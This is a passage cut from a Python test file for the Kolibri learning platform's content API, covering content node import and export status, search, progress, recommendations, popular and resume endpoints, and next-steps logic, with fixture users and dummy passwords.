"id": c3_id,
"title": "c2",
"kind": "topic",
"is_leaf": False,
"available": False,
"total_resources": 1,
"on_device_resources": 0,
"importable": True,
"coach_content": False,
"num_coach_contents": 0,
"new_resource": False,
"num_new_resources": 0,
"updated_resource": False,
},
],
},
)
@mock.patch("kolibri.core.content.api.get_channel_stats_from_peer")
def test_contentnode_granular_remote_import(self, stats_mock):
content.LocalFile.objects.update(available=False)
content.ContentNode.objects.update(available=False)
c1 = content.ContentNode.objects.get(title="root")
c1_id = c1.id
c2_id = content.ContentNode.objects.get(title="c1").id
c3_id = content.ContentNode.objects.get(title="c2").id
stats = {
c1_id: {
"total_resources": 1,
"coach_content": False,
"num_coach_contents": 0,
},
c3_id: {
"total_resources": 1,
"coach_content": False,
"num_coach_contents": 0,
},
}
stats_mock.return_value = stats
response = self.client.get(
reverse("kolibri:core:contentnode_granular-detail", kwargs={"pk": c1_id}),
{"importing_from_peer_id": "test"},
)
self.assertEqual(
response.data,
{
"id": c1_id,
"title": "root",
"kind": "topic",
"is_leaf": False,
"available": False,
"total_resources": 1,
"on_device_resources": 0,
"importable": True,
"coach_content": False,
"num_coach_contents": 0,
"new_resource": False,
"num_new_resources": 0,
"updated_resource": False,
"ancestors": list(c1.get_ancestors().values("id", "title")),
"children": [
{
"id": c2_id,
"title": "c1",
"kind": "video",
"is_leaf": True,
"available": False,
"total_resources": 0,
"on_device_resources": 0,
"importable": False,
"coach_content": False,
"num_coach_contents": 0,
"new_resource": False,
"num_new_resources": 0,
"updated_resource": False,
},
{
"id": c3_id,
"title": "c2",
"kind": "topic",
"is_leaf": False,
"available": False,
"total_resources": 1,
"on_device_resources": 0,
"importable": True,
"coach_content": False,
"num_coach_contents": 0,
"new_resource": False,
"num_new_resources": 0,
"updated_resource": False,
},
],
},
)
def test_contentnode_granular_export_available(self):
c1 = content.ContentNode.objects.get(title="c1")
c1_id = c1.id
content.ContentNode.objects.filter(title="c1").update(on_device_resources=1)
response = self.client.get(
reverse("kolibri:core:contentnode_granular-detail", kwargs={"pk": c1_id}),
data={"for_export": True},
)
self.assertEqual(
response.data,
{
"id": c1_id,
"title": "c1",
"kind": "video",
"is_leaf": True,
"available": True,
"total_resources": 1,
"on_device_resources": 1,
"importable": None,
"children": [],
"coach_content": False,
"num_coach_contents": 0,
"new_resource": None,
"num_new_resources": None,
"updated_resource": None,
"ancestors": list(c1.get_ancestors().values("id", "title")),
},
)
def test_contentnode_granular_export_unavailable(self):
c1 = content.ContentNode.objects.get(title="c1")
c1_id = c1.id
content.ContentNode.objects.filter(title="c1").update(available=False)
response = self.client.get(
reverse("kolibri:core:contentnode_granular-detail", kwargs={"pk": c1_id}),
data={"for_export": True},
)
self.assertEqual(
response.data,
{
"id": c1_id,
"title": "c1",
"kind": "video",
"is_leaf": True,
"available": False,
"total_resources": 0,
"on_device_resources": 0,
"importable": None,
"children": [],
"coach_content": False,
"num_coach_contents": 0,
"new_resource": None,
"num_new_resources": None,
"updated_resource": None,
"ancestors": list(c1.get_ancestors().values("id", "title")),
},
)
def test_contentnode_retrieve(self):
c1_id = content.ContentNode.objects.get(title="c1").id
response = self.client.get(
reverse("kolibri:core:contentnode-detail", kwargs={"pk": c1_id})
)
self.assertEqual(response.data["id"], c1_id.__str__())
def test_contentnode_descendants_assessments_exercise_node(self):
c1 = content.ContentNode.objects.filter(kind=content_kinds.EXERCISE).first()
c1_id = c1.id
response = self.client.get(
reverse("kolibri:core:contentnode-descendants-assessments"),
data={"ids": c1_id},
)
self.assertEqual(
next(
item["num_assessments"] for item in response.data if item["id"] == c1_id
),
c1.assessmentmetadata.first().number_of_assessments,
)
def test_contentnode_descendants_assessments_exercise_parent(self):
c1 = content.ContentNode.objects.filter(kind=content_kinds.EXERCISE).first()
parent = c1.parent
parent_id = parent.id
response = self.client.get(
reverse("kolibri:core:contentnode-descendants-assessments"),
data={"ids": parent_id},
)
self.assertEqual(
next(
item["num_assessments"]
for item in response.data
if item["id"] == parent_id
),
c1.assessmentmetadata.first().number_of_assessments,
)
def test_contentnode_descendants_assessments_exercise_root(self):
c1 = content.ContentNode.objects.filter(kind=content_kinds.EXERCISE).first()
root = content.ContentNode.objects.get(parent__isnull=True)
root_id = root.id
response = self.client.get(
reverse("kolibri:core:contentnode-descendants-assessments"),
data={"ids": root_id},
)
self.assertEqual(
next(
item["num_assessments"]
for item in response.data
if item["id"] == root_id
),
c1.assessmentmetadata.first().number_of_assessments,
)
def test_contentnode_descendants_assessments_exercise_parent_sum_siblings(self):
c1 = content.ContentNode.objects.filter(kind=content_kinds.EXERCISE).first()
parent = c1.parent
parent_id = parent.id
sibling = content.ContentNode.objects.create(
pk="6a406ac66b224106aa2e93f73a94333d",
channel_id=c1.channel_id,
content_id="ded4a083e75f4689b386fd2b706e792a",
kind=content_kinds.EXERCISE,
parent=parent,
title="sibling exercise",
available=True,
)
sibling_assessment_metadata = content.AssessmentMetaData.objects.create(
id="6a406ac66b224106aa2e93f73a94333d",
contentnode=sibling,
number_of_assessments=5,
)
response = self.client.get(
reverse("kolibri:core:contentnode-descendants-assessments"),
data={"ids": parent_id},
)
self.assertEqual(
next(
item["num_assessments"]
for item in response.data
if item["id"] == parent_id
),
c1.assessmentmetadata.first().number_of_assessments
+ sibling_assessment_metadata.number_of_assessments,
)
def test_contentnode_descendants_assessments_exercise_parent_sum_siblings_one_unavailable(
self,
):
c1 = content.ContentNode.objects.filter(kind=content_kinds.EXERCISE).first()
c1.available = False
c1.save()
parent = c1.parent
parent_id = parent.id
sibling = content.ContentNode.objects.create(
pk="6a406ac66b224106aa2e93f73a94333d",
channel_id=c1.channel_id,
content_id="ded4a083e75f4689b386fd2b706e792a",
kind=content_kinds.EXERCISE,
parent=parent,
title="sibling exercise",
available=True,
)
sibling_assessment_metadata = content.AssessmentMetaData.objects.create(
id="6a406ac66b224106aa2e93f73a94333d",
contentnode=sibling,
number_of_assessments=5,
)
response = self.client.get(
reverse("kolibri:core:contentnode-descendants-assessments"),
data={"ids": parent_id},
)
self.assertEqual(
next(
item["num_assessments"]
for item in response.data
if item["id"] == parent_id
),
sibling_assessment_metadata.number_of_assessments,
)
def test_contentnode_descendants_topic_siblings_ancestor_ids(self):
root = content.ContentNode.objects.get(parent__isnull=True)
topics = content.ContentNode.objects.filter(
parent=root, kind=content_kinds.TOPIC
)
topic_ids = topics.values_list("id", flat=True)
response = self.client.get(
reverse("kolibri:core:contentnode-descendants"),
data={"ids": ",".join(topic_ids)},
)
for datum in response.data:
topic = topics.get(id=datum["ancestor_id"])
self.assertTrue(topic.get_descendants().filter(id=datum["id"]).exists())
def test_contentnode_descendants_topic_siblings_kind_filter(self):
root = content.ContentNode.objects.get(parent__isnull=True)
topics = content.ContentNode.objects.filter(
parent=root, kind=content_kinds.TOPIC
)
topic_ids = topics.values_list("id", flat=True)
response = self.client.get(
reverse("kolibri:core:contentnode-descendants"),
data={
"ids": ",".join(topic_ids),
"descendant_kind": content_kinds.EXERCISE,
},
)
for datum in response.data:
topic = topics.get(id=datum["ancestor_id"])
self.assertTrue(
topic.get_descendants()
.filter(id=datum["id"], kind=content_kinds.EXERCISE)
.exists()
)
def test_contentnode_descendants_topic_parent_child_ancestor_ids(self):
root = content.ContentNode.objects.get(parent__isnull=True)
topic = content.ContentNode.objects.filter(
parent=root, kind=content_kinds.TOPIC, children__isnull=False
).first()
response = self.client.get(
reverse("kolibri:core:contentnode-descendants"),
data={"ids": ",".join((root.id, topic.id))},
)
topic_items = [
datum for datum in response.data if datum["ancestor_id"] == topic.id
]
for node in topic.get_descendants(include_self=False).filter(available=True):
self.assertTrue(next(item for item in topic_items if item["id"] == node.id))
root_items = [
datum for datum in response.data if datum["ancestor_id"] == root.id
]
for node in root.get_descendants(include_self=False).filter(available=True):
self.assertTrue(next(item for item in root_items if item["id"] == node.id))
def test_contentnode_descendants_availability(self):
content.ContentNode.objects.all().update(available=False)
root = content.ContentNode.objects.get(parent__isnull=True)
topics = content.ContentNode.objects.filter(
parent=root, kind=content_kinds.TOPIC
)
topic_ids = topics.values_list("id", flat=True)
response = self.client.get(
reverse("kolibri:core:contentnode-descendants"),
data={"ids": ",".join(topic_ids)},
)
self.assertEqual(len(response.data), 0)
def test_contentnode_node_assessments_available(self):
content.ContentNode.objects.all().update(available=True)
root = content.ContentNode.objects.get(parent__isnull=True)
exercise_ids = (
root.get_descendants()
.filter(kind=content_kinds.EXERCISE)
.values_list("id", flat=True)
)
response = self.client.get(
reverse("kolibri:core:contentnode-node-assessments"),
data={"ids": ",".join(exercise_ids)},
)
self.assertEqual(response.data, 1)
def test_contentnode_node_assessments_not_available(self):
content.ContentNode.objects.all().update(available=False)
root = content.ContentNode.objects.get(parent__isnull=True)
exercise_ids = (
root.get_descendants()
.filter(kind=content_kinds.EXERCISE)
.values_list("id", flat=True)
)
response = self.client.get(
reverse("kolibri:core:contentnode-node-assessments"),
data={"ids": ",".join(exercise_ids)},
)
self.assertEqual(response.data, 0)
def test_contentnode_recommendations(self):
node_id = content.ContentNode.objects.get(title="c2c2").id
response = self.client.get(
reverse(
"kolibri:core:contentnode-recommendations-for", kwargs={"pk": node_id}
)
)
self.assertEqual(len(response.data), 2)
def test_contentnode_recommendations_does_error_for_unavailable_node(self):
node = content.ContentNode.objects.get(title="c2c2")
node.available = False
node.save()
node_id = node.id
response = self.client.get(
reverse(
"kolibri:core:contentnode-recommendations-for", kwargs={"pk": node_id}
)
)
self.assertEqual(response.status_code, 404)
def test_contentnode_ids(self):
titles = ["c2c2", "c2c3"]
nodes = [content.ContentNode.objects.get(title=title) for title in titles]
response = self.client.get(
reverse("kolibri:core:contentnode-list"),
data={"ids": ",".join([n.id for n in nodes])},
)
self.assertEqual(len(response.data), 2)
for i in range(len(titles)):
self.assertEqual(response.data[i]["title"], titles[i])
def test_contentnode_parent(self):
parent = content.ContentNode.objects.get(title="c2")
children = parent.get_children()
response = self.client.get(
reverse("kolibri:core:contentnode-list"),
data={"parent": parent.id, "include_coach_content": False},
)
self.assertEqual(len(response.data), children.count())
for i in range(len(children)):
self.assertEqual(response.data[i]["title"], children[i].title)
def test_contentnode_tags(self):
expected = {
"root": ["tag_1", "tag_2", "tag_3"],
"c1": ["tag_1"],
"c2": ["tag_2"],
}
for title, tags in expected.items():
node = content.ContentNode.objects.get(title=title)
response = self.client.get(
reverse("kolibri:core:contentnode-detail", kwargs={"pk": node.id})
)
self.assertEqual(set(response.data["tags"]), set(tags))
def test_channelmetadata_list(self):
response = self.client.get(reverse("kolibri:core:channel-list", kwargs={}))
self.assertEqual(response.data[0]["name"], "testing")
def test_channelmetadata_retrieve(self):
data = content.ChannelMetadata.objects.values()[0]
response = self.client.get(
reverse("kolibri:core:channel-detail", kwargs={"pk": data["id"]})
)
self.assertEqual(response.data["name"], "testing")
def test_channelmetadata_langfield(self):
data = content.ChannelMetadata.objects.first()
root_lang = content.Language.objects.get(pk=1)
data.root.lang = root_lang
data.root.save()
response = self.client.get(
reverse("kolibri:core:channel-detail", kwargs={"pk": data.id})
)
self.assertEqual(response.data["lang_code"], root_lang.lang_code)
self.assertEqual(response.data["lang_name"], root_lang.lang_name)
def test_channelmetadata_langfield_none(self):
data = content.ChannelMetadata.objects.first()
response = self.client.get(
reverse("kolibri:core:channel-detail", kwargs={"pk": data.id})
)
self.assertEqual(response.data["lang_code"], None)
self.assertEqual(response.data["lang_name"], None)
def test_channelmetadata_content_available_param_filter_lowercase_true(self):
response = self.client.get(
reverse("kolibri:core:channel-list"), {"available": "true"}
)
self.assertEqual(response.data[0]["id"], "6199dde695db4ee4ab392222d5af1e5c")
def test_channelmetadata_content_available_param_filter_uppercase_true(self):
response = self.client.get(
reverse("kolibri:core:channel-list"), {"available": True}
)
self.assertEqual(response.data[0]["id"], "6199dde695db4ee4ab392222d5af1e5c")
def test_channelmetadata_content_unavailable_param_filter_false(self):
content.ContentNode.objects.filter(title="root").update(available=False)
response = self.client.get(
reverse("kolibri:core:channel-list"), {"available": False}
)
self.assertEqual(response.data[0]["id"], "6199dde695db4ee4ab392222d5af1e5c")
def test_channelmetadata_content_available_field_true(self):
response = self.client.get(reverse("kolibri:core:channel-list"))
self.assertEqual(response.data[0]["available"], True)
def test_channelmetadata_content_available_field_false(self):
content.ContentNode.objects.filter(title="root").update(available=False)
response = self.client.get(reverse("kolibri:core:channel-list"))
self.assertEqual(response.data[0]["available"], False)
def test_channelmetadata_has_exercises_filter(self):
# Has nothing else for that matter...
no_exercise_channel = content.ContentNode.objects.create(
pk="6a406ac66b224106aa2e93f73a94333d",
channel_id="f8ec4a5d14cd4716890999da596032d2",
content_id="ded4a083e75f4689b386fd2b706e792a",
kind="topic",
title="no exercise channel",
)
content.ChannelMetadata.objects.create(
id="63acff41781543828861ade41dbdd7ff",
name="no exercise channel metadata",
root=no_exercise_channel,
)
no_filter_response = self.client.get(reverse("kolibri:core:channel-list"))
self.assertEqual(len(no_filter_response.data), 2)
with_filter_response = self.client.get(
reverse("kolibri:core:channel-list"), {"has_exercise": True}
)
self.assertEqual(len(with_filter_response.data), 1)
self.assertEqual(with_filter_response.data[0]["name"], "testing")
def test_file_list(self):
response = self.client.get(reverse("kolibri:core:file-list"))
self.assertEqual(len(response.data), 5)
def test_file_retrieve(self):
response = self.client.get(
reverse(
"kolibri:core:file-detail",
kwargs={"pk": "6bdfea4a01830fdd4a585181c0b8068c"},
)
)
self.assertEqual(response.data["preset"], "high_res_video")
def _setup_contentnode_progress(self):
# set up data for testing progress_fraction field on content node endpoint
facility = Facility.objects.create(name="MyFac")
user = FacilityUser.objects.create(username="learner", facility=facility)
user.set_password("pass")
user.save()
root = content.ContentNode.objects.get(title="root")
c1 = content.ContentNode.objects.get(title="c1")
c2 = content.ContentNode.objects.get(title="c2")
c2c1 = content.ContentNode.objects.get(title="c2c1")
c2c3 = content.ContentNode.objects.get(title="c2c3")
for node, progress in [(c2c1, 0.7), (c2c3, 0.5)]:
ContentSummaryLog.objects.create(
user=user,
content_id=node.content_id,
progress=progress,
channel_id=self.the_channel_id,
start_timestamp=datetime.datetime.now(),
)
return facility, root, c1, c2, c2c1, c2c3
def test_contentnode_progress_detail_endpoint(self):
facility, root, c1, c2, c2c1, c2c3 = self._setup_contentnode_progress()
def assert_progress(node, progress):
response = self.client.get(
reverse(
"kolibri:core:contentnodeprogress-detail", kwargs={"pk": node.id}
)
)
self.assertEqual(response.data["progress_fraction"], progress)
# check that there is no progress when not logged in
assert_progress(root, 0)
assert_progress(c1, 0)
assert_progress(c2, 0)
assert_progress(c2c1, 0)
# check that progress is calculated appropriately when user is logged in
self.client.login(username="learner", password="pass", facility=facility)
# The progress endpoint is used, so should report progress for topics
assert_progress(root, 0.24)
assert_progress(c1, 0)
assert_progress(c2, 0.4)
assert_progress(c2c1, 0.7)
def test_contentnode_progress_list_endpoint(self):
facility, root, c1, c2, c2c1, c2c3 = self._setup_contentnode_progress()
response = self.client.get(reverse("kolibri:core:contentnodeprogress-list"))
def get_progress_fraction(node):
return list(filter(lambda x: x["id"] == node.id, response.data))[0][
"progress_fraction"
]
# check that there is no progress when not logged in
self.assertEqual(get_progress_fraction(root), 0)
self.assertEqual(get_progress_fraction(c1), 0)
self.assertEqual(get_progress_fraction(c2), 0)
self.assertEqual(get_progress_fraction(c2c1), 0)
# check that progress is calculated appropriately when user is logged in
self.client.login(username="learner", password="pass", facility=facility)
response = self.client.get(reverse("kolibri:core:contentnodeprogress-list"))
# The progress endpoint is used, so should report progress for topics
self.assertEqual(get_progress_fraction(root), 0.24)
self.assertEqual(get_progress_fraction(c1), 0)
self.assertEqual(get_progress_fraction(c2), 0.4)
self.assertEqual(get_progress_fraction(c2c1), 0.7)
def test_filtering_coach_content_anon(self):
response = self.client.get(
reverse("kolibri:core:contentnode-list"),
data={"include_coach_content": False},
)
# TODO make content_test.json fixture more organized. Here just, hardcoding the correct count
self.assertEqual(len(response.data), 7)
def test_filtering_coach_content_admin(self):
self.client.login(username=self.admin.username, password=DUMMY_PASSWORD)
response = self.client.get(
reverse("kolibri:core:contentnode-list"),
data={"include_coach_content": True},
)
expected_output = content.ContentNode.objects.exclude(
available=False
).count() # coach_content node should be returned
self.assertEqual(len(response.data), expected_output)
def test_copies(self):
# the pk is actually a content id
response = self.client.get(
reverse(
"kolibri:core:contentnode-copies",
kwargs={"pk": "c6f49ea527824f398f4d5d26faf19396"},
)
)
expected_titles = set(["root", "c1", "copy"])
response_titles = set()
for node in response.data[0]:
response_titles.add(node["title"])
self.assertSetEqual(expected_titles, response_titles)
def test_available_copies(self):
# the pk is actually a content id
response = self.client.get(
reverse(
"kolibri:core:contentnode-copies",
kwargs={"pk": "f2332710c2fd483386cdeb5dcbdda81a"},
)
)
# no results should be returned for unavailable content node
self.assertEqual(len(response.data), 0)
def test_copies_count(self):
response = self.client.get(
reverse("kolibri:core:contentnode-copies-count"),
data={
"content_ids": "f2332710c2fd483386cdeb5dcbdda81f,c6f49ea527824f398f4d5d26faf15555,f2332710c2fd483386cdeb5dcbdda81a"
},
)
# assert non existent content id does not show up in results
# no results should be returned for unavailable content node
self.assertEqual(len(response.data), 1)
self.assertEqual(
response.data[0]["count"],
content.ContentNode.objects.filter(
content_id="f2332710c2fd483386cdeb5dcbdda81f"
).count(),
)
def test_search_total_results(self):
response = self.client.get(
reverse("kolibri:core:contentnode_search-list"), data={"search": "root"}
)
self.assertEqual(response.data["total_results"], 1)
def test_search_kinds(self):
response = self.client.get(
reverse("kolibri:core:contentnode_search-list"), data={"search": "root"}
)
self.assertEqual(list(response.data["content_kinds"]), [content_kinds.TOPIC])
def test_search_repeated_kinds(self):
# Ensure that each kind is only returned once.
response = self.client.get(
reverse("kolibri:core:contentnode_search-list"), data={"search": "c"}
)
kinds = response.data["content_kinds"][:]
self.assertEqual(len(kinds), len(set(kinds)))
def test_search_channels(self):
response = self.client.get(
reverse("kolibri:core:contentnode_search-list"), data={"search": "root"}
)
self.assertEqual(response.data["channel_ids"][:], [self.the_channel_id])
def test_search_repeated_channels(self):
# Ensure that each channel_id is only returned once.
response = self.client.get(
reverse("kolibri:core:contentnode_search-list"), data={"search": "c"}
)
channel_ids = response.data["channel_ids"][:]
self.assertEqual(len(channel_ids), len(set(channel_ids)))
def test_search(self):
# ensure search works when there are no words not defined
response = self.client.get(
reverse("kolibri:core:contentnode_search-list"), data={"search": "!?,"}
)
self.assertEqual(len(response.data["results"]), 0)
# ensure search words when there is only stopwords
response = self.client.get(
reverse("kolibri:core:contentnode_search-list"), data={"search": "or"}
)
self.assertEqual(len(response.data["results"]), 0)
# regular search
response = self.client.get(
reverse("kolibri:core:contentnode_search-list"), data={"search": "root"}
)
self.assertEqual(len(response.data["results"]), 1)
def _create_session_logs(self):
content_ids = (
"f2332710c2fd483386cdeb5ecbdda81f",
"ce603df7c46b424b934348995e1b05fb",
"481e1bda1faa445d801ceb2afbd2f42f",
)
channel_id = "6199dde695db4ee4ab392222d5af1e5c"
[
ContentSessionLog.objects.create(
channel_id=channel_id,
content_id=content_ids[0],
start_timestamp=timezone.now(),
kind="audio",
)
for _ in range(50)
]
[
ContentSessionLog.objects.create(
channel_id=channel_id,
content_id=content_ids[1],
start_timestamp=timezone.now(),
kind="exercise",
)
for _ in range(25)
]
[
ContentSessionLog.objects.create(
channel_id=channel_id,
content_id=content_ids[2],
start_timestamp=timezone.now(),
kind="document",
)
for _ in range(1)
]
# create log for non existent content id
# should not show up in api response
ContentSessionLog.objects.create(
channel_id=uuid.uuid4().hex,
content_id=uuid.uuid4().hex,
start_timestamp=timezone.now(),
kind="content",
)
return content_ids
def test_popular(self):
expected_content_ids = self._create_session_logs()
response = self.client.get(reverse("kolibri:core:contentnode-popular"))
response_content_ids = set(node["content_id"] for node in response.json())
self.assertSetEqual(set(expected_content_ids), response_content_ids)
def test_popular_no_coach_content(self):
expected_content_ids = self._create_session_logs()
node = content.ContentNode.objects.get(content_id=expected_content_ids[0])
node.coach_content = True
node.save()
expected_content_ids = expected_content_ids[1:]
response = self.client.get(
reverse("kolibri:core:contentnode-popular"),
data={"include_coach_content": False},
)
response_content_ids = set(node["content_id"] for node in response.json())
self.assertSetEqual(set(expected_content_ids), response_content_ids)
def test_popular_coach_has_coach_content(self):
coach = FacilityUser.objects.create(username="coach", facility=self.facility)
coach.set_password(DUMMY_PASSWORD)
coach.save()
self.facility.add_coach(coach)
expected_content_ids = self._create_session_logs()
node = content.ContentNode.objects.get(content_id=expected_content_ids[0])
node.coach_content = True
node.save()
self.client.login(username="coach", password=DUMMY_PASSWORD)
response = self.client.get(
reverse("kolibri:core:contentnode-popular"),
data={"include_coach_content": True},
)
response_content_ids = set(node["content_id"] for node in response.json())
self.assertSetEqual(set(expected_content_ids), response_content_ids)
def test_popular_ten_minute_cache(self):
self._create_session_logs()
response = self.client.get(reverse("kolibri:core:contentnode-popular"))
self.assertEqual(response["Cache-Control"], "max-age=600")
def _create_summary_logs(self):
facility = Facility.objects.create(name="MyFac")
user = FacilityUser.objects.create(username="user", facility=facility)
content_ids = ("f2332710c2fd483386cdeb5ecbdda81f",)
channel_id = "6199dde695db4ee4ab392222d5af1e5c"
ContentSummaryLog.objects.create(
channel_id=channel_id,
content_id=content_ids[0],
user_id=user.id,
start_timestamp=timezone.now(),
kind="audio",
)
# create log with progress of 1
# should not show up in api response
ContentSummaryLog.objects.create(
channel_id=channel_id,
content_id="ce603df7c46b424b934348995e1b05fb",
user_id=user.id,
progress=1,
start_timestamp=timezone.now(),
kind="audio",
)
# create log for non existent content id
# should not show up in api response
ContentSummaryLog.objects.create(
channel_id=uuid.uuid4().hex,
content_id=uuid.uuid4().hex,
user_id=user.id,
start_timestamp=timezone.now(),
kind="content",
)
user.set_password(DUMMY_PASSWORD)
user.save()
return user, content_ids
def test_resume(self):
user, expected_content_ids = self._create_summary_logs()
self.client.login(username=user.username, password=DUMMY_PASSWORD)
response = self.client.get(
reverse("kolibri:core:contentnode-resume", kwargs={"pk": user.id})
)
response_content_ids = set(node["content_id"] for node in response.json())
self.assertSetEqual(set(expected_content_ids), response_content_ids)
def test_resume_wrong_id(self):
user, expected_content_ids = self._create_summary_logs()
self.client.login(username=user.username, password=DUMMY_PASSWORD)
response = self.client.get(
reverse("kolibri:core:contentnode-resume", kwargs={"pk": "wrong"})
)
response_content_ids = [node["content_id"] for node in response.json()]
self.assertEqual([], response_content_ids)
def test_resume_zero_cache(self):
user, expected_content_ids = self._create_summary_logs()
self.client.login(username=user.username, password=DUMMY_PASSWORD)
response = self.client.get(
reverse("kolibri:core:contentnode-resume", kwargs={"pk": user.id})
)
self.assertEqual(response["Cache-Control"], "max-age=0")
def test_next_steps_prereq(self):
facility = Facility.objects.create(name="MyFac")
user = FacilityUser.objects.create(username="user", facility=facility)
root = content.ContentNode.objects.get(title="root")
ContentSummaryLog.objects.create(
channel_id=root.channel_id,
content_id=root.content_id,
user_id=user.id,
progress=1,
start_timestamp=timezone.now(),
kind="audio",
)
user.set_password(DUMMY_PASSWORD)
user.save()
self.client.login(username=user.username, password=DUMMY_PASSWORD)
post_req = root.prerequisite_for.first()
expected_content_ids = (post_req.content_id,)
response = self.client.get(
reverse("kolibri:core:contentnode-next-steps", kwargs={"pk": user.id})
)
response_content_ids = set(node["content_id"] for node in response.json())
self.assertSetEqual(set(expected_content_ids), response_content_ids)
def test_next_steps_prereq_zero_cache(self):
facility = Facility.objects.create(name="MyFac")
user = FacilityUser.objects.create(username="user", facility=facility)
root = content.ContentNode.objects.get(title="root")
ContentSummaryLog.objects.create(
channel_id=root.channel_id,
content_id=root.content_id,
user_id=user.id,
progress=1,
start_timestamp=timezone.now(),
kind="audio",
)
user.set_password(DUMMY_PASSWORD)
user.save()
self.client.login(username=user.username, password=DUMMY_PASSWORD)
response = self.client.get(
reverse("kolibri:core:contentnode-next-steps", kwargs={"pk": user.id})
)
self.assertEqual(response["Cache-Control"], "max-age=0")
def test_next_steps_prereq_wrong_id(self):
facility = Facility.objects.create(name="MyFac")
user = FacilityUser.objects.create(username="user", facility=facility)
root = content.ContentNode.objects.get(title="root")
ContentSummaryLog.objects.create(
channel_id=root.channel_id,
content_id=root.content_id,
user_id=user.id,
progress=1,
start_timestamp=timezone.now(),
kind="audio",
)
user.set_password(DUMMY_PASSWORD)
user.save()
self.client.login(username=user.username, password=DUMMY_PASSWORD)
response = self.client.get(
reverse("kolibri:core:contentnode-next-steps", kwargs={"pk": "wrong"})
)
response_content_ids = [node["content_id"] for node in response.json()]
self.assertEqual([], response_content_ids)
def test_next_steps_prereq_in_progress(self):
facility = Facility.objects.create(name="MyFac")
user = FacilityUser.objects.create(username="user", facility=facility)
root = content.ContentNode.objects.get(title="root")
ContentSummaryLog.objects.create(
channel_id=root.channel_id,
content_id=root.content_id,
user_id=user.id,
progress=1,
start_timestamp=timezone.now(),
kind="audio",
)
user.set_password(DUMMY_PASSWORD)
user.save()
self.client.login(username=user.username, password=DUMMY_PASSWORD)
post_req = root.prerequisite_for.first()
ContentSummaryLog.objects.create(
channel_id=post_req.channel_id,
content_id=post_req.content_id,
user_id=user.id,
progress=0.5,
start_timestamp=timezone.now(),
kind="audio",
)
expected_content_ids = []
response = self.client.get(
reverse("kolibri:core:contentnode-next-steps", kwargs={"pk": user.id})
)
response_content_ids = set(node["content_id"] for node in response.json())
self.assertSetEqual(set(expected_content_ids), response_content_ids)
def test_next_steps_prereq_coach_content_not_coach(self):
facility = Facility.objects.create(name="MyFac")
user = FacilityUser.objects.create(username="user", facility=facility)
root = content.ContentNode.objects.get(title="root")
ContentSummaryLog.objects.create(
channel_id=root.channel_id,
content_id=root.content_id,
user_id=user.id,
progress=1,
start_timestamp=timezone.now(),
kind="audio",
)
user.set_password(DUMMY_PASSWORD)
user.save()
self.client.login(username=user.username, password=DUMMY_PASSWORD)
post_req = root.prerequisite_for.first()
post_req.coach_content = True
post_req.save()
response = self.client.get(
reverse("kolibri:core:contentnode-next-steps", kwargs={"pk": user.id})
)
response_content_ids = set(node["content_id"] for node in response.json())
self.assertSetEqual(set(), response_content_ids)
def test_next_steps_prereq_coach_content_coach(self):
facility = Facility.objects.create(name="MyFac")
user = FacilityUser.objects.create(username="user", facility=facility)
facility.add_coach(user)
root = content.ContentNode.objects.get(title="root")
ContentSummaryLog.objects.create(
channel_id=root.channel_id,
content_id=root.content_id,
user_id=user.id,
progress=1,
start_timestamp=timezone.now(),
kind="audio",
)
user.set_password(DUMMY_PASSWORD)
user.save()
self.client.login(username=user.username, password=DUMMY_PASSWORD)
post_req = root.prerequisite_for.first()
post_req.coach_content = True
post_req.save()
expected_content_ids = (post_req.content_id,)
response = self.client.get(
reverse("kolibri:core:contentnode-next-steps", kwargs={"pk": user.id})
)
response_content_ids = set(node["content_id"] for node in response.json())
self.assertSetEqual(set(expected_content_ids), response_content_ids)
def test_next_steps_sibling(self):
facility = Facility.objects.create(name="MyFac")
user = FacilityUser.objects.create(username="user", facility=facility)
node = content.ContentNode.objects.get(
content_id="ce603df7c46b424b934348995e1b05fb"
)
ContentSummaryLog.objects.create(
channel_id=node.channel_id,
content_id=node.content_id,
user_id=user.id,
progress=1,
start_timestamp=timezone.now(),
kind="audio",
)
user.set_password(DUMMY_PASSWORD)
user.save()
self.client.login(username=user.username, password=DUMMY_PASSWORD)
sibling = node.get_next_sibling()
expected_content_ids = (sibling.content_id,)
response = self.client.get(
reverse("kolibri:core:contentnode-next-steps", kwargs={"pk": user.id})
)
response_content_ids = set(node["content_id"] for node in response.json())
self.assertSetEqual(set(expected_content_ids), response_content_ids)
def test_next_steps_sibling_in_progress(self):
facility = Facility.objects.create(name="MyFac")
user = FacilityUser.objects.create(username="user", facility=facility)
node = content.ContentNode.objects.get(
content_id="ce603df7c46b424b934348995e1b05fb"
)
ContentSummaryLog.objects.create(
channel_id=node.channel_id,
content_id=node.content_id,
user_id=user.id,
progress=1,
start_timestamp=timezone.now(),
kind="audio",
)
user.set_password(DUMMY_PASSWORD)
user.save()
self.client.login(username=user.username, password=DUMMY_PASSWORD)
sibling = node.get_next_sibling()
ContentSummaryLog.objects.create(
channel_id=sibling.channel_id,
content_id=sibling.content_id,
user_id=user.id,
progress=0.5,
start_timestamp=timezone.now(),
kind="audio",
)
expected_content_ids = []
response = self.client.get(
reverse("kolibri:core:contentnode-next-steps", kwargs={"pk": user.id})
)
response_content_ids = set(node["content_id"] for node in response.json())
self.assertSetEqual(set(expected_content_ids), response_content_ids)
def test_next_steps_sibling_coach_content_not_coach(self):
facility = Facility.objects.create(name="MyFac")
user = FacilityUser.objects.create(username="user", facility=facility)
node = content.ContentNode.objects.get(
content_id="ce603df7c46b424b934348995e1b05fb"
)
ContentSummaryLog.objects.create(
channel_id=node.channel_id,
content_id=node.content_id,
user_id=user.id,
progress=1,
start_timestamp=timezone.now(),
kind="audio",
)
user.set_password(DUMMY_PASSWORD)
user.save()
self.client.login(username=user.username, password=DUMMY_PASSWORD)
sibling = node.get_next_sibling()
sibling.coach_content = True
sibling.save()
response = self.client.get(
reverse("kolibri:core:contentnode-next-steps", kwargs={"pk": user.id})
)
response_content_ids = set(node["content_id"] for node in response.json())
self.assertSetEqual(set(), response_content_ids)
def test_next_steps_sibling_coach_content_coach(self):
facility = Facility.objects.create(name="MyFac")
user = FacilityUser.objects.create(username="user", facility=facility)
facility.add_coach(user)
node = content.ContentNode.objects.get(
content_id="ce603df7c46b424b934348995e1b05fb"
)
ContentSummaryLog.objects.create(
channel_id=node.channel_id,
content_id=node.content_id,
user_id=user.id,
progress=1,
start_timestamp=timezone.now(),
kind="audio",
)
user.set_password(DUMMY_PASSWORD)
user.save()
self.client.login(username=user.username, password=DUMMY_PASSWORD)
sibling = node.get_next_sibling()
sibling.coach_content = True
sibling.save()
